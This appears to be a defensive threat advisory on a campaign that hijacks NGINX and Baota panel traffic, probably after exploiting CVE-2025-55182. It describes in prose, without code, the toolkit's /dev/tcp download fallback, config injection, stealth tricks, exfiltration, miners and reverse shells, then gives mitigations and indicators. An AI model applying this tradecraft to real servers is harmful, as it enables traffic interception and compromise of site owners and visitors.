Comprehensive Threat Exposure Management Platform
Hive Pro recognized in Gartner® Magic Quadrant™ for Exposure Assessment Platform, 2025 Watch platform in action
Threat actors are actively conducting a sophisticated web traffic hijacking campaign targeting NGINX servers and Baota (BT) hosting management panels across Asia, with particular focus on India, Indonesia, Peru, Bangladesh, Thailand, and China. This operation likely exploits the critical React2Shell vulnerability (CVE-2025-55182) to gain initial access to vulnerable servers, after which attackers deploy a multi-stage shell-based toolkit that automates server compromise, malicious configuration injection, persistence establishment, and intelligence exfiltration. The campaign specifically targets government agencies, educational institutions, and web hosting providers, representing a significant threat to critical infrastructure and sensitive organizational networks.
The attack methodology demonstrates sophisticated understanding of web server architecture and configuration management systems. Threat actors tamper with NGINX configuration files to silently intercept and reroute legitimate website traffic through attacker-controlled proxy infrastructure, enabling traffic manipulation, data interception, and further exploitation capabilities. The operation primarily targets domains with Asian country code top-level domains including .in (India), .id (Indonesia), .pe (Peru), .bd (Bangladesh), and .th (Thailand), as well as Chinese hosting environments. Additionally, the campaign shows particular interest in government and educational domains, suggesting potential intelligence collection or cyber-espionage motivations.
The technical execution involves deployment of an orchestrator script that retrieves additional payloads using standard utilities like curl and wget, but importantly includes fallback mechanisms leveraging Bash’s /dev/tcp feature to send HTTP requests directly when standard download tools are unavailable or restricted. This ensures infection success even in hardened or restricted server environments. The attackers deploy environment-specific scripts tailored for different deployment scenarios: bt.sh targets systems running Baota management panels, 4zdh.sh focuses on conventional NGINX installations, and zdh.sh concentrates on Linux and containerized deployments.
The injected NGINX configurations manipulate web traffic routing based on domain extensions, directing government, education, and Asian domains through specific proxy networks while maintaining separate routing for Indian and Indonesian domains, with a general fallback handling all remaining traffic. To maintain operational stealth and avoid detection, the malicious configurations preserve original request headers so redirected traffic appears legitimate to backend systems, only redirect requests hitting predefined paths that resemble gaming, casino, blog, or support pages to reduce detection probability, and implement hash-based tracking to prevent repeated injections that might trigger anomaly detection. Post-compromise activities include deployment of cryptocurrency mining malware and establishment of reverse shells, demonstrating that attackers pursue both automated resource monetization and maintained interactive control over compromised infrastructure.
The campaign initiates with attackers gaining unauthorized access to exposed NGINX servers, most likely through exploitation of the critical React2Shell vulnerability (CVE-2025-55182), which affects React Server Components and allows remote code execution on vulnerable systems. Once initial access is established, threat actors deploy an orchestrator script named zx.sh that functions as the central command-and-control loader for the entire attack chain. This orchestrator script demonstrates sophisticated operational resilience by retrieving additional payload components using common Unix utilities like curl and wget for standard HTTP downloads.
Critically, the orchestrator includes a fallback mechanism that leverages Bash’s native /dev/tcp pseudo-device feature to send HTTP requests directly when standard download utilities are unavailable, blocked by security controls, or removed from the system. This /dev/tcp technique allows the attackers to establish TCP connections and perform HTTP communications using only built-in shell capabilities, ensuring that the infection chain proceeds successfully even in restricted or hardened server environments where external tools have been removed or blocked by security policies.
After establishing persistent access through the orchestrator, attackers deploy tailored scripts specifically designed to modify NGINX configurations based on the detected server environment and management framework. The bt.sh script specifically targets systems running the Baota (BT) management panel, a popular Chinese server management platform widely used across Asian hosting environments. This script methodically scans Baota-specific configuration directories and injects malicious location blocks that quietly proxy selected web traffic to attacker-controlled backend servers without triggering visible changes in website functionality or user experience.
A more sophisticated script variant named 4zdh.sh focuses on conventional NGINX installations deployed without third-party management panels. This script carefully edits configuration files across multiple standard NGINX directories including /etc/nginx/, /usr/local/nginx/conf/, and other common paths, while implementing configuration validation using the nginx -t command before attempting to reload services. This validation step ensures that injected configurations are syntactically correct and will not cause NGINX service disruption that would alert administrators to the compromise.
Another variant named zdh.sh concentrates specifically on Linux bare-metal and containerized deployments, applying targeted configuration injections optimized for these environments. This script forcefully restarts NGINX services when needed to ensure that configuration changes take immediate effect, demonstrating the attackers’ operational focus on maintaining reliable traffic interception capabilities even at the cost of brief service interruptions that might be attributed to normal administrative activities or system updates.
The injected NGINX configurations implement sophisticated traffic manipulation logic that selectively redirects web requests through attacker-controlled proxy infrastructure based on domain extension analysis and request path matching. The routing decisions are made based on top-level domain analysis: government domains (.gov), educational domains (.edu, .ac), and specific Asian country code domains are funneled through one designated proxy network, while domains from India (.in) and Indonesia (.id) are routed through a separate proxy infrastructure, with a general fallback proxy handling all remaining domain traffic.
To maintain operational stealth and avoid detection by security monitoring systems or suspicious website administrators, the malicious configurations implement several evasion techniques. The configurations preserve original HTTP request headers including Host, User-Agent, Referer, and X-Forwarded-For, ensuring that redirected traffic appears completely legitimate to backend application servers. Only requests hitting predefined URL paths that resemble gaming content, casino pages, blog posts, or support documentation are actually redirected, significantly reducing the volume of redirected traffic and lowering the probability of detection through traffic pattern analysis.
Persistence and anti-reinfection mechanisms are implemented through hash-based tracking files stored in /tmp/.domain_group_map.conf and careful configuration management logic that checks for existing injections before attempting to modify configurations. This prevents the creation of duplicate malicious configuration blocks that would be more likely to be noticed by administrators conducting routine configuration reviews or troubleshooting activities.
In the final operational phase, attackers deploy a reconnaissance script that gathers comprehensive intelligence about all successfully hijacked server configurations and documents the relationships between compromised domains and attacker-controlled proxy infrastructure. This collected data includes details about the number of compromised virtual hosts, traffic volumes being redirected, backend server configurations, and the effectiveness of different injection techniques across various server environments.
The reconnaissance data is systematically exfiltrated to command-and-control servers using authenticated HTTP requests that include operational tokens or credentials, with the data transmission occurring either through standard tools like curl when available or through direct TCP communication using Bash’s /dev/tcp capabilities when standard tools are restricted. The authentication mechanisms ensure that only legitimate attacker infrastructure can receive the exfiltrated intelligence, preventing data interception by third parties monitoring network traffic.
Post-compromise activities extend beyond traffic hijacking to include deployment of cryptocurrency mining malware that monetizes compromised server computational resources, and establishment of reverse shell backdoors that provide interactive command-line access for future operations. These additional payloads demonstrate that attackers pursue multiple monetization and operational objectives simultaneously: automated passive income through cryptocurrency mining, intelligence collection through traffic interception, and maintained access through persistent backdoors for future campaigns or lateral movement operations.
Organizations must conduct immediate and comprehensive audits of all NGINX configuration files across managed server infrastructure, specifically examining location blocks for unauthorized proxy_pass directives pointing to unfamiliar backend domains, unexpected rewrite rules that modify request routing, and suspicious proxy configurations that forward traffic to external infrastructure. Security teams should review configuration files in /etc/nginx/, /usr/local/nginx/conf/, /www/server/panel/vhost/nginx/, and any custom configuration directories, comparing current configurations against known-good baselines or version-controlled configuration repositories.
Organizations must prioritize patching all systems susceptible to the React2Shell vulnerability (CVE-2025-55182), which serves as the primary initial access vector for this traffic hijacking campaign. Security teams should verify patch status across all internet-facing servers running React-based applications, particularly those implementing React Server Components functionality. Organizations should implement vulnerability scanning to identify all systems running vulnerable React versions and establish emergency patching procedures for critical internet-facing infrastructure.
Organizations should deploy file integrity monitoring (FIM) solutions configured with detection rules that alert on any modifications to NGINX configuration files. Monitoring should cover all directories containing configuration files including /etc/nginx/, /usr/local/nginx/conf/, /www/server/panel/vhost/nginx/, and custom configuration paths. Security operations centers should receive immediate alerts on any changes to files with the .conf extension in these critical paths, enabling rapid investigation of potential unauthorized configuration tampering before traffic hijacking becomes operational.
Organizations running Baota management panels must implement strict access controls restricting panel access to trusted IP addresses only, enforce strong authentication credentials combined with multi-factor authentication for all administrative accounts, and ensure panels are updated to the latest version with all available security patches. Security teams should audit Baota panel access logs regularly for unauthorized login attempts, unusual configuration changes, or suspicious administrative activities that might indicate compromise or reconnaissance by threat actors.
Organizations should implement network segmentation and egress filtering policies that prevent web servers from initiating outbound connections to unauthorized external domains or IP addresses. NGINX servers typically should not need to establish connections to arbitrary external hosts for normal operational purposes. Security teams should implement firewall rules that whitelist only necessary outbound connections for legitimate purposes such as package updates from trusted repositories, API communications with authorized third-party services, and log forwarding to internal security infrastructure.
Organizations must implement automated configuration validation workflows that compare NGINX configurations against known-good baselines before allowing any reload or restart operations. Configuration management should be implemented using version control systems such as Git, enabling security teams to track all configuration changes, identify unauthorized modifications, and rapidly roll back malicious changes. Automated validation should include syntax checking using nginx -t, semantic analysis for suspicious proxy directives, and approval workflows for configuration changes in production environments.
Security operations centers should perform deep packet inspection and network traffic analysis to identify anomalous proxy patterns where legitimate user traffic is being unexpectedly routed through intermediary servers before reaching intended backend destinations. Organizations should establish baseline traffic patterns for web applications and implement anomaly detection that alerts on discrepancies between expected direct backend communications and actual traffic flows through unexpected proxy infrastructure. Network security monitoring should specifically look for traffic being routed through the documented malicious domains and IP addresses associated with this campaign.
The web traffic hijacking campaign demonstrates sophisticated adversary tradecraft mapped to multiple MITRE ATT&CK tactics and techniques:
Initial Access: T1190 (Exploit Public-Facing Application) – Attackers likely exploit the React2Shell vulnerability (CVE-2025-55182) to compromise internet-facing NGINX servers.
Execution: T1059.004 (Unix Shell) – The attack chain relies extensively on shell scripts including the zx.sh orchestrator and environment-specific configuration injection scripts.
Persistence: T1505.004 (Server Software Component – IIS Components, mapped as web server component modification) – Attackers establish persistence through malicious NGINX configuration modifications that survive service restarts.
Defense Evasion: T1027 (Obfuscated Files or Information) – The malicious scripts and configurations employ various obfuscation techniques to evade detection.
Discovery: T1083 (File and Directory Discovery), T1082 (System Information Discovery) – Attackers perform extensive reconnaissance of server file systems and configurations to identify NGINX installations, Baota panels, and appropriate injection targets.
Collection: T1557 (Adversary-in-the-Middle) – The core objective of the campaign is traffic interception through malicious proxy configurations that position attackers as man-in-the-middle between legitimate users and backend servers.
Exfiltration: T1041 (Exfiltration Over C2 Channel) – Reconnaissance data about compromised configurations and hijacked domains is exfiltrated to attacker command-and-control infrastructure.
Resource Development: T1583.001 (Acquire Infrastructure – Domains) – Attackers have established proxy infrastructure using multiple domains for traffic interception operations.
The campaign utilizes multiple domains for traffic interception proxy infrastructure including xzz.pier46.com, ide.hashbank8.com, and th.cogicpt.org. Organizations should immediately block network communications to these domains at firewall, web proxy, and DNS security layers. Security teams should review historical web server access logs, NGINX proxy logs, and network flow data for evidence of connections to these domains, which indicate compromised NGINX configurations actively redirecting traffic through attacker-controlled infrastructure.
The threat actors operate command-and-control infrastructure using IP address 158.94.210.227 for payload distribution, reconnaissance data exfiltration, and operational communications. Organizations should block connections to this IP address and investigate any historical communications that may indicate prior compromise or ongoing traffic hijacking operations.
Compromised systems contain the file /tmp/.domain_group_map.conf which serves as a tracking database for injected configurations and prevents duplicate injections. Security teams should search all NGINX servers for this file, as its presence is a definitive indicator of compromise. Additionally, organizations should search for the orchestrator script zx.sh and environment-specific injection scripts bt.sh, 4zdh.sh, and zdh.sh in common temporary directories, web server directories, and writable system locations.
https://securitylabs.datadoghq.com/articles/web-traffic-hijacking-nginx-configuration-malicious/
https://hivepro.com/threat-advisory/react2shell-flaw-in-react-server-components-under-active-attack/
Get through updates and upcoming events, and more directly in your inbox